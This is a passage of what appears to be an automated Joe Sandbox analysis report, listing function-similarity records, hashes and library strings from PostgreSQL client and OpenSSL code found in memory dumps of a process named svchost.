                                                                                            • String ID: could not encrypt password: %s$fe_sendauth: error sending password authentication$fe_sendauth: no password supplied$out of memory
                                                                                            • API String ID: 2190258309-2372536895
                                                                                            • Opcode ID: a70327720f6d7fc06b7bbb70a404fd256294a0b92721834c3d629fed90484baf
                                                                                            • Instruction ID: 50cb620d2592387da69c851d7a7d24998daecd55ee6f3b6368ffe2a456b3db9c
                                                                                            • Opcode Fuzzy Hash: a70327720f6d7fc06b7bbb70a404fd256294a0b92721834c3d629fed90484baf
                                                                                            • Instruction Fuzzy Hash: 8F41B322B0AA4295FA649B15E4606F96352FB45BE4F582231CF2D237D3DF2EE546C308
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3451764609.00007FFDA36D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFDA36D0000, based on PE: true
                                                                                            • Associated: 0000002A.00000002.3451740549.00007FFDA36D0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451805412.00007FFDA36F8000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451839464.00007FFDA371E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451862794.00007FFDA371F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_7ffda36d0000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID: freemallocmemcpy$R_clear_errorlibintl_gettext
                                                                                            • String ID: out of memory
                                                                                            • API String ID: 2345935813-2599737071
                                                                                            • Opcode ID: 4b0df2c565e75c284d1b8c0ccc761c5961d104eb9a9d2f1ad5d828e460f74820
                                                                                            • Instruction ID: 4f8d958a58b5c51ef139f962c5d65dcf307dcf03318cffb58572a5828df99b43
                                                                                            • Opcode Fuzzy Hash: 4b0df2c565e75c284d1b8c0ccc761c5961d104eb9a9d2f1ad5d828e460f74820
                                                                                            • Instruction Fuzzy Hash: 9C31AF22B0BB4645FA10EB12A8356B926526F55FD4F4C6131EE1E673C7EE3EE0098308
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3451563505.00007FFDA3601000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFDA3600000, based on PE: true
                                                                                            • Associated: 0000002A.00000002.3451531136.00007FFDA3600000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451655757.00007FFDA3690000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451689034.00007FFDA36BD000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451714646.00007FFDA36C1000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_7ffda3600000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID: R_newR_set_debug
                                                                                            • String ID: ssl\record\methods\tls13_meth.c$tls13_add_record_padding
                                                                                            • API String ID: 193678381-2980714504
                                                                                            • Opcode ID: 67d9a1e3e754e3a4fe518b5f32cc3468fd2d591aeb2d7c82136290c08ffe844d
                                                                                            • Instruction ID: 462caed1f0a959ad868be651c37810629946483657fb7203e7f326c6fc277714
                                                                                            • Opcode Fuzzy Hash: 67d9a1e3e754e3a4fe518b5f32cc3468fd2d591aeb2d7c82136290c08ffe844d
                                                                                            • Instruction Fuzzy Hash: 7931C121B0E69283FB589B2294613E96693AF94BC0F0CA471DF5C67787DF2EE5608214
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3451563505.00007FFDA3601000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFDA3600000, based on PE: true
                                                                                            • Associated: 0000002A.00000002.3451531136.00007FFDA3600000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451655757.00007FFDA3690000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451689034.00007FFDA36BD000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451714646.00007FFDA36C1000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_7ffda3600000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID: R_newR_set_debug
                                                                                            • String ID: ssl\statem\extensions_srvr.c$tls_construct_stoc_status_request
                                                                                            • API String ID: 193678381-1174127863
                                                                                            • Opcode ID: 69967520ab07d786b5007b022920560fe12736c1b069c0e31d578238edd2043d
                                                                                            • Instruction ID: 05eb51092c81959fea0cb86795470e2184172bb381a42533964c20f6d5e7149a
                                                                                            • Opcode Fuzzy Hash: 69967520ab07d786b5007b022920560fe12736c1b069c0e31d578238edd2043d
                                                                                            • Instruction Fuzzy Hash: 8C31F661F1E14242F7968715E5AA7B92392EF447C4F9C6031EA0C937D7DF2ED8818708
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3451764609.00007FFDA36D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFDA36D0000, based on PE: true
                                                                                            • Associated: 0000002A.00000002.3451740549.00007FFDA36D0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451805412.00007FFDA36F8000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451839464.00007FFDA371E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451862794.00007FFDA371F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_7ffda36d0000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID: _errno$libintl_dgettext
                                                                                            • String ID: %s not allowed in pipeline mode$PQsendQuery$command string is a null pointer$show password_encryption
                                                                                            • API String ID: 2163055111-3415876621
                                                                                            • Opcode ID: 2fc157f76cac9ed13452ab7c5aec64b4437422d02c5ae8174f9a0550526bae77
                                                                                            • Instruction ID: fd49de970066cc25d8a99eced937d3d3c3d6dbc2cec3ecd5923cf90447b6b2dc
                                                                                            • Opcode Fuzzy Hash: 2fc157f76cac9ed13452ab7c5aec64b4437422d02c5ae8174f9a0550526bae77
                                                                                            • Instruction Fuzzy Hash: 0B319922B0AA4285FA449F16F5603A96392EF487C4F4C6432EF0D5F797DF2ED0948708
                                                                                            Strings
                                                                                            • could not send data to server: %s, xrefs: 00007FFDA36EA0D8
                                                                                            • server closed the connection unexpectedlyThis probably means the server terminated abnormallybefore or while processing the request., xrefs: 00007FFDA36EA0FE
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3451764609.00007FFDA36D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFDA36D0000, based on PE: true
                                                                                             • Associated: 0000002A.00000002.3451740549.00007FFDA36D0000.00000002.00000001.01000000.0000000D.sdmp
                                                                                             • Associated: 0000002A.00000002.3451805412.00007FFDA36F8000.00000002.00000001.01000000.0000000D.sdmp
                                                                                             • Associated: 0000002A.00000002.3451839464.00007FFDA371E000.00000004.00000001.01000000.0000000D.sdmp
                                                                                             • Associated: 0000002A.00000002.3451862794.00007FFDA371F000.00000002.00000001.01000000.0000000D.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_7ffda36d0000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID: ErrorLastR_clear_errorR_get_error
                                                                                            • String ID: could not send data to server: %s$server closed the connection unexpectedlyThis probably means the server terminated abnormallybefore or while processing the request.
                                                                                            • API String ID: 2061372100-3185302654
                                                                                            • Opcode ID: f71a0201ed2f93dc30e78459b94b2cdd1b1b939d3de1c0ee11a05d597a034dcb
                                                                                            • Instruction ID: dc1cdcdb480a7b00cd70e877ae15bb00dd4c95623979e7c7471ad2efc5c9304c
                                                                                            • Opcode Fuzzy Hash: f71a0201ed2f93dc30e78459b94b2cdd1b1b939d3de1c0ee11a05d597a034dcb
                                                                                            • Instruction Fuzzy Hash: 8C31DD25B1BAC241F6609724E4343FA2692BF85B85F5C1035DA4C677D7DE3EE10AC708
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3451764609.00007FFDA36D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFDA36D0000, based on PE: true
                                                                                             • Associated: 0000002A.00000002.3451740549.00007FFDA36D0000.00000002.00000001.01000000.0000000D.sdmp
                                                                                             • Associated: 0000002A.00000002.3451805412.00007FFDA36F8000.00000002.00000001.01000000.0000000D.sdmp
                                                                                             • Associated: 0000002A.00000002.3451839464.00007FFDA371E000.00000004.00000001.01000000.0000000D.sdmp
                                                                                             • Associated: 0000002A.00000002.3451862794.00007FFDA371F000.00000002.00000001.01000000.0000000D.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_7ffda36d0000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID: fputc
                                                                                            • String ID: "%s"$ %d$ NNNN$Parse$mismatched message length: consumed %d, expected %d
                                                                                            • API String ID: 1992160199-3213124284
                                                                                            • Opcode ID: 9e1f6f89a83819611208f11f02b220badd6a7350036da421f155b2d4807d85c9
                                                                                            • Instruction ID: 36dfe8f2d687369f15999baddbff371d8604e2239e7d6f280e3c426cd930358f
                                                                                            • Opcode Fuzzy Hash: 9e1f6f89a83819611208f11f02b220badd6a7350036da421f155b2d4807d85c9
                                                                                            • Instruction Fuzzy Hash: 322191A1B1B65641FA10DB15E4A16B81363EF407C8F487231DD0E27387DE6FE549D308
                                                                                            APIs
                                                                                            Strings
                                                                                            • could not send data to server: %s, xrefs: 00007FFDA36EA31E
                                                                                            • server closed the connection unexpectedlyThis probably means the server terminated abnormallybefore or while processing the request., xrefs: 00007FFDA36EA344
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3451764609.00007FFDA36D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFDA36D0000, based on PE: true
                                                                                             • Associated: 0000002A.00000002.3451740549.00007FFDA36D0000.00000002.00000001.01000000.0000000D.sdmp
                                                                                             • Associated: 0000002A.00000002.3451805412.00007FFDA36F8000.00000002.00000001.01000000.0000000D.sdmp
                                                                                             • Associated: 0000002A.00000002.3451839464.00007FFDA371E000.00000004.00000001.01000000.0000000D.sdmp
                                                                                             • Associated: 0000002A.00000002.3451862794.00007FFDA371F000.00000002.00000001.01000000.0000000D.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_7ffda36d0000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID: ErrorLast$_strdupsend
                                                                                            • String ID: could not send data to server: %s$server closed the connection unexpectedlyThis probably means the server terminated abnormallybefore or while processing the request.
                                                                                            • API String ID: 4220554821-3185302654
                                                                                            • Opcode ID: fd3771ac3c9e00c962aabd381d91c46ee957a6d18d2fd4c51b92376f32d7113e
                                                                                            • Instruction ID: 5f15633991a638db5d355d9d0ec18d4e446a2fdac73a055439766b6ac499c9d2
                                                                                            • Opcode Fuzzy Hash: fd3771ac3c9e00c962aabd381d91c46ee957a6d18d2fd4c51b92376f32d7113e
                                                                                            • Instruction Fuzzy Hash: 7D31DB11B1BA8245FA219725E4243FA2253AF89784F9C1031DE4DA77D7DE3EE14AC708
                                                                                            APIs
                                                                                            • strncmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,00007FFDA36D6A42,?,?,?,00007FFDA36D3380), ref: 00007FFDA36DA836
                                                                                            • strncmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,00007FFDA36D6A42,?,?,?,00007FFDA36D3380), ref: 00007FFDA36DA850
                                                                                            • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FFDA36D6A42,?,?,?,00007FFDA36D3380), ref: 00007FFDA36DA8B4
                                                                                            • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FFDA36D6A42,?,?,?,00007FFDA36D3380), ref: 00007FFDA36DA8E8
                                                                                            • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FFDA36D6A42,?,?,?,00007FFDA36D3380), ref: 00007FFDA36DA8FC
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3451764609.00007FFDA36D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFDA36D0000, based on PE: true
                                                                                             • Associated: 0000002A.00000002.3451740549.00007FFDA36D0000.00000002.00000001.01000000.0000000D.sdmp
                                                                                             • Associated: 0000002A.00000002.3451805412.00007FFDA36F8000.00000002.00000001.01000000.0000000D.sdmp
                                                                                             • Associated: 0000002A.00000002.3451839464.00007FFDA371E000.00000004.00000001.01000000.0000000D.sdmp
                                                                                             • Associated: 0000002A.00000002.3451862794.00007FFDA371F000.00000002.00000001.01000000.0000000D.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_7ffda36d0000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID: free$strncmp
                                                                                            • String ID: postgres://$postgresql://
                                                                                            • API String ID: 2582455447-2050216600
                                                                                            • Opcode ID: 0b96a70d8e5ce64e49a8001619f6b522e121ba2cee285d0aad116d79a6df67a7
                                                                                            • Instruction ID: 135d7720b9351e977c6251d74030a4924af8cbd6fc61f8e8931254155152f450
                                                                                            • Opcode Fuzzy Hash: 0b96a70d8e5ce64e49a8001619f6b522e121ba2cee285d0aad116d79a6df67a7
                                                                                            • Instruction Fuzzy Hash: 61312D22B1EE5281FB509B12E5603B96352EB49BC4F4C2031DE4E6B796DF3ED881C748
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3451764609.00007FFDA36D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFDA36D0000, based on PE: true
                                                                                             • Associated: 0000002A.00000002.3451740549.00007FFDA36D0000.00000002.00000001.01000000.0000000D.sdmp
                                                                                             • Associated: 0000002A.00000002.3451805412.00007FFDA36F8000.00000002.00000001.01000000.0000000D.sdmp
                                                                                             • Associated: 0000002A.00000002.3451839464.00007FFDA371E000.00000004.00000001.01000000.0000000D.sdmp
                                                                                             • Associated: 0000002A.00000002.3451862794.00007FFDA371F000.00000002.00000001.01000000.0000000D.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_7ffda36d0000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID: isprint
                                                                                            • String ID: "%s"$ "SSSS"$ %c$ \x%02x$%s
                                                                                            • API String ID: 3707773532-2909481662
                                                                                            • Opcode ID: 61c18fc8364e6b8451701bf3c71c6be493a848bc41b1a039f9b57a604ffcc4c5
                                                                                            • Instruction ID: e63b6dd4a20c06a89df637281f1cb65819cf5485d8852824b291379851adb6ed
                                                                                            • Opcode Fuzzy Hash: 61c18fc8364e6b8451701bf3c71c6be493a848bc41b1a039f9b57a604ffcc4c5
                                                                                            • Instruction Fuzzy Hash: 1931C07270A68286F710CF11E8A027A7762EB40BD5F0C6235DB6A1739ADE7DE164C748
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3451764609.00007FFDA36D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFDA36D0000, based on PE: true
                                                                                             • Associated: 0000002A.00000002.3451740549.00007FFDA36D0000.00000002.00000001.01000000.0000000D.sdmp
                                                                                             • Associated: 0000002A.00000002.3451805412.00007FFDA36F8000.00000002.00000001.01000000.0000000D.sdmp
                                                                                             • Associated: 0000002A.00000002.3451839464.00007FFDA371E000.00000004.00000001.01000000.0000000D.sdmp
                                                                                             • Associated: 0000002A.00000002.3451862794.00007FFDA371F000.00000002.00000001.01000000.0000000D.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_7ffda36d0000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID: ErrorLast$getsocknamegetsockopt
                                                                                            • String ID: could not get client address from socket: %s$could not get socket error status: %s
                                                                                            • API String ID: 332088430-1479310242
                                                                                            • Opcode ID: a0ca23f1ef8d962aaa07ecf870553447d7bea091005cfd7051242a6258a68f38
                                                                                            • Instruction ID: a096b427c0a09955efc810084bf530bccf47207fb34c405fde5dac74ff2ebd86
                                                                                            • Opcode Fuzzy Hash: a0ca23f1ef8d962aaa07ecf870553447d7bea091005cfd7051242a6258a68f38
                                                                                            • Instruction Fuzzy Hash: 6531AF2270AA8281FB418F25D0252ED2362FF45788F582132CE5D2B79ADF3EE5458754
                                                                                            APIs
                                                                                            Strings
                                                                                            • server closed the connection unexpectedlyThis probably means the server terminated abnormallybefore or while processing the request., xrefs: 00007FFDA36E9FD3
                                                                                            • could not receive data from server: %s, xrefs: 00007FFDA36E9FC2
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3451764609.00007FFDA36D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFDA36D0000, based on PE: true
                                                                                             • Associated: 0000002A.00000002.3451740549.00007FFDA36D0000.00000002.00000001.01000000.0000000D.sdmp
                                                                                             • Associated: 0000002A.00000002.3451805412.00007FFDA36F8000.00000002.00000001.01000000.0000000D.sdmp
                                                                                             • Associated: 0000002A.00000002.3451839464.00007FFDA371E000.00000004.00000001.01000000.0000000D.sdmp
                                                                                             • Associated: 0000002A.00000002.3451862794.00007FFDA371F000.00000002.00000001.01000000.0000000D.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_7ffda36d0000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID: ErrorLast$L_get_errorR_clear_errorR_get_errorrecv
                                                                                            • String ID: could not receive data from server: %s$server closed the connection unexpectedlyThis probably means the server terminated abnormallybefore or while processing the request.
                                                                                            • API String ID: 3938477122-737636320
                                                                                            • Opcode ID: 436409de14f033de0cdc6b93a3e0c5de171e81197e83066652ac92ef7f89ac72
                                                                                            • Instruction ID: f11ae98f9dc06f4fdd610e042028087ea0c72b9231310f6429c7c8640673e2fd
                                                                                            • Opcode Fuzzy Hash: 436409de14f033de0cdc6b93a3e0c5de171e81197e83066652ac92ef7f89ac72
                                                                                            • Instruction Fuzzy Hash: C721C521B0F64241FA655766E8743BA16C36F48B94F5C6136CE0D27B97DE2EE409830C
                                                                                            APIs
                                                                                            • WSASetLastError.WS2_32 ref: 00007FFDA36EA1BE
                                                                                            • recv.WS2_32 ref: 00007FFDA36EA1D4
                                                                                            • WSAGetLastError.WS2_32 ref: 00007FFDA36EA1E1
                                                                                              • Part of subcall function 00007FFDA36EC450: LoadLibraryExA.KERNEL32(?,?,?,?,?,?,?,00007FFDA36EA0D8), ref: 00007FFDA36EC4CF
                                                                                              • Part of subcall function 00007FFDA36EC450: FormatMessageA.KERNEL32(?,?,?,?,?,?,?,00007FFDA36EA0D8), ref: 00007FFDA36EC516
                                                                                              • Part of subcall function 00007FFDA36E2D70: _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,-00000001,00007FFDA36D15B3), ref: 00007FFDA36E2D89
                                                                                              • Part of subcall function 00007FFDA36E2D70: _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FFDA36E2DB1
                                                                                              • Part of subcall function 00007FFDA36E2D70: libintl_dgettext.LIBINTL-9 ref: 00007FFDA36E2DD2
                                                                                            • WSASetLastError.WS2_32 ref: 00007FFDA36EA241
                                                                                            Strings
                                                                                            • server closed the connection unexpectedlyThis probably means the server terminated abnormallybefore or while processing the request., xrefs: 00007FFDA36EA22C
                                                                                            • could not receive data from server: %s, xrefs: 00007FFDA36EA21B
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3451764609.00007FFDA36D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFDA36D0000, based on PE: true
                                                                                             • Associated: 0000002A.00000002.3451740549.00007FFDA36D0000.00000002.00000001.01000000.0000000D.sdmp
                                                                                             • Associated: 0000002A.00000002.3451805412.00007FFDA36F8000.00000002.00000001.01000000.0000000D.sdmp
                                                                                             • Associated: 0000002A.00000002.3451839464.00007FFDA371E000.00000004.00000001.01000000.0000000D.sdmp
                                                                                             • Associated: 0000002A.00000002.3451862794.00007FFDA371F000.00000002.00000001.01000000.0000000D.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_7ffda36d0000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID: ErrorLast$_errno$FormatLibraryLoadMessagelibintl_dgettextrecv
                                                                                            • String ID: could not receive data from server: %s$server closed the connection unexpectedlyThis probably means the server terminated abnormallybefore or while processing the request.
                                                                                            • API String ID: 1521657377-737636320
                                                                                            • Opcode ID: 074450965423942cefc9357b9ea067bec30b7a2c326155d897dac7edac3fbefc
                                                                                            • Instruction ID: 826a0c8c55a3b0e5b29aaa57b4e2708ec3520aa5e5ae89f56e26e9518b9c6a8c
                                                                                            • Opcode Fuzzy Hash: 074450965423942cefc9357b9ea067bec30b7a2c326155d897dac7edac3fbefc
                                                                                            • Instruction Fuzzy Hash: 62210521B0AA4248FA616B25F8383BA52836F89780F5C2131DD4D66797DE2FE11C830C
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3451764609.00007FFDA36D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFDA36D0000, based on PE: true
                                                                                             • Associated: 0000002A.00000002.3451740549.00007FFDA36D0000.00000002.00000001.01000000.0000000D.sdmp
                                                                                             • Associated: 0000002A.00000002.3451805412.00007FFDA36F8000.00000002.00000001.01000000.0000000D.sdmp
                                                                                             • Associated: 0000002A.00000002.3451839464.00007FFDA371E000.00000004.00000001.01000000.0000000D.sdmp
                                                                                             • Associated: 0000002A.00000002.3451862794.00007FFDA371F000.00000002.00000001.01000000.0000000D.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_7ffda36d0000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID: ErrorLast$L_get_errorR_clear_errorR_get_error
                                                                                            • String ID: unrecognized SSL error code: %d
                                                                                            • API String ID: 3701004716-952604332
                                                                                            • Opcode ID: 02a047a687f13f7a9f86478cdfdec1976e68288809bcef0581f72d603ca78dee
                                                                                            • Instruction ID: 4d662a4ac5699852023217a69be3e9304269fa8ec0e5ccfa3b66efce0ebb744f
                                                                                            • Opcode Fuzzy Hash: 02a047a687f13f7a9f86478cdfdec1976e68288809bcef0581f72d603ca78dee
                                                                                            • Instruction Fuzzy Hash: 3011B922B07A0245F915AB26A8257BA62426F48FE0F1C5130DD2D563D7DE3DE4058308
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3451764609.00007FFDA36D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFDA36D0000, based on PE: true
                                                                                             • Associated: 0000002A.00000002.3451740549.00007FFDA36D0000.00000002.00000001.01000000.0000000D.sdmp
                                                                                             • Associated: 0000002A.00000002.3451805412.00007FFDA36F8000.00000002.00000001.01000000.0000000D.sdmp
                                                                                             • Associated: 0000002A.00000002.3451839464.00007FFDA371E000.00000004.00000001.01000000.0000000D.sdmp
                                                                                             • Associated: 0000002A.00000002.3451862794.00007FFDA371F000.00000002.00000001.01000000.0000000D.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_7ffda36d0000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID: _errno$LastStatus_unlink$CloseHandle_rmdir
                                                                                            • String ID:
                                                                                            • API String ID: 1774506580-0
                                                                                            • Opcode ID: 2335ae7606b33d04b9c9d2b8bd84ff0b697aea561ef6dff8f13415cc08399b5d
                                                                                            • Instruction ID: 826875401bfaa3cf42147341e26843d47a9693cc4ece5af7a52bde7fe6b22a98
                                                                                            • Opcode Fuzzy Hash: 2335ae7606b33d04b9c9d2b8bd84ff0b697aea561ef6dff8f13415cc08399b5d
                                                                                            • Instruction Fuzzy Hash: AE218021F0FA4285F6605B61A9652392293AF40B95F9D6030D64E62B97CE2EEC418B2D
                                                                                            APIs
                                                                                            • LoadLibraryExA.KERNEL32(?,?,?,?,00007FFDA36F43A0,?,?,?,?,?,?,?,?,?,?,?), ref: 00007FFDA36F5E65
                                                                                            • GetLastError.KERNEL32(?,?,?,?,00007FFDA36F43A0,?,?,?,?,?,?,?,?,?,?,?), ref: 00007FFDA36F5E73
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3451764609.00007FFDA36D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFDA36D0000, based on PE: true
                                                                                             • Associated: 0000002A.00000002.3451740549.00007FFDA36D0000.00000002.00000001.01000000.0000000D.sdmp
                                                                                             • Associated: 0000002A.00000002.3451805412.00007FFDA36F8000.00000002.00000001.01000000.0000000D.sdmp
                                                                                             • Associated: 0000002A.00000002.3451839464.00007FFDA371E000.00000004.00000001.01000000.0000000D.sdmp
                                                                                             • Associated: 0000002A.00000002.3451862794.00007FFDA371F000.00000002.00000001.01000000.0000000D.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_7ffda36d0000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID: ErrorLastLibraryLoad
                                                                                            • String ID: ntdll.dll
                                                                                            • API String ID: 3568775529-2227199552
                                                                                            • Opcode ID: 19580ed0add17ae7b2876d3daa3a19b57faeaebdc5a5a450045f4867bbb11a35
                                                                                            • Instruction ID: 3c8cd93d513249f7603bc541cbe857cce1bd2d1597081968cba5ea8caa512385
                                                                                            • Opcode Fuzzy Hash: 19580ed0add17ae7b2876d3daa3a19b57faeaebdc5a5a450045f4867bbb11a35
                                                                                            • Instruction Fuzzy Hash: 5521A426F1BB8282FB449B25A46426D3392FF88B84F8C1531DA4E13796DF3DE4458708
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3451764609.00007FFDA36D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFDA36D0000, based on PE: true
                                                                                             • Associated: 0000002A.00000002.3451740549.00007FFDA36D0000.00000002.00000001.01000000.0000000D.sdmp
                                                                                             • Associated: 0000002A.00000002.3451805412.00007FFDA36F8000.00000002.00000001.01000000.0000000D.sdmp
                                                                                             • Associated: 0000002A.00000002.3451839464.00007FFDA371E000.00000004.00000001.01000000.0000000D.sdmp
                                                                                             • Associated: 0000002A.00000002.3451862794.00007FFDA371F000.00000002.00000001.01000000.0000000D.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_7ffda36d0000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID: fputc
                                                                                            • String ID: "%s"$ %d$ NNNN$NotificationResponse$mismatched message length: consumed %d, expected %d
                                                                                            • API String ID: 1992160199-3690904892
                                                                                            • Opcode ID: 7faf837148ad8942d3d7fe39494ca3e35661f06d59979be2503916a2947dbc88
                                                                                            • Instruction ID: d2622f1e2f86aceb090544b4a4f9e68f98df6363dfcb755f41d1b3ffdc9dbcef
                                                                                            • Opcode Fuzzy Hash: 7faf837148ad8942d3d7fe39494ca3e35661f06d59979be2503916a2947dbc88
                                                                                            • Instruction Fuzzy Hash: 2111E1A2B0B64681FA10DB11E5A16F82363AF407C8F482231DE0E27797DE6FE149C308
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3451764609.00007FFDA36D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFDA36D0000, based on PE: true
                                                                                             • Associated: 0000002A.00000002.3451740549.00007FFDA36D0000.00000002.00000001.01000000.0000000D.sdmp
                                                                                             • Associated: 0000002A.00000002.3451805412.00007FFDA36F8000.00000002.00000001.01000000.0000000D.sdmp
                                                                                             • Associated: 0000002A.00000002.3451839464.00007FFDA371E000.00000004.00000001.01000000.0000000D.sdmp
                                                                                             • Associated: 0000002A.00000002.3451862794.00007FFDA371F000.00000002.00000001.01000000.0000000D.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_7ffda36d0000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID: fputc
                                                                                            • String ID: "%s"$ %d$ErrorResponse$Execute$mismatched message length: consumed %d, expected %d
                                                                                            • API String ID: 1992160199-3429532571
                                                                                            • Opcode ID: e20a8be7a420778d62b8b16ecbea484d730a2198554cfe0d67d83f26565880a2
                                                                                            • Instruction ID: 0276ef736320037e9f53e339e12431eb0d04fe051f26387da86d7e9444daff41
                                                                                            • Opcode Fuzzy Hash: e20a8be7a420778d62b8b16ecbea484d730a2198554cfe0d67d83f26565880a2
                                                                                            • Instruction Fuzzy Hash: 52118E62B1B68685F610DB11E0616A92362EB447C8F486132EE0E2775BCF7EE589C718
                                                                                            APIs
                                                                                            • WSAGetLastError.WS2_32 ref: 00007FFDA36E82FF
                                                                                            • WSAGetLastError.WS2_32 ref: 00007FFDA36E8309
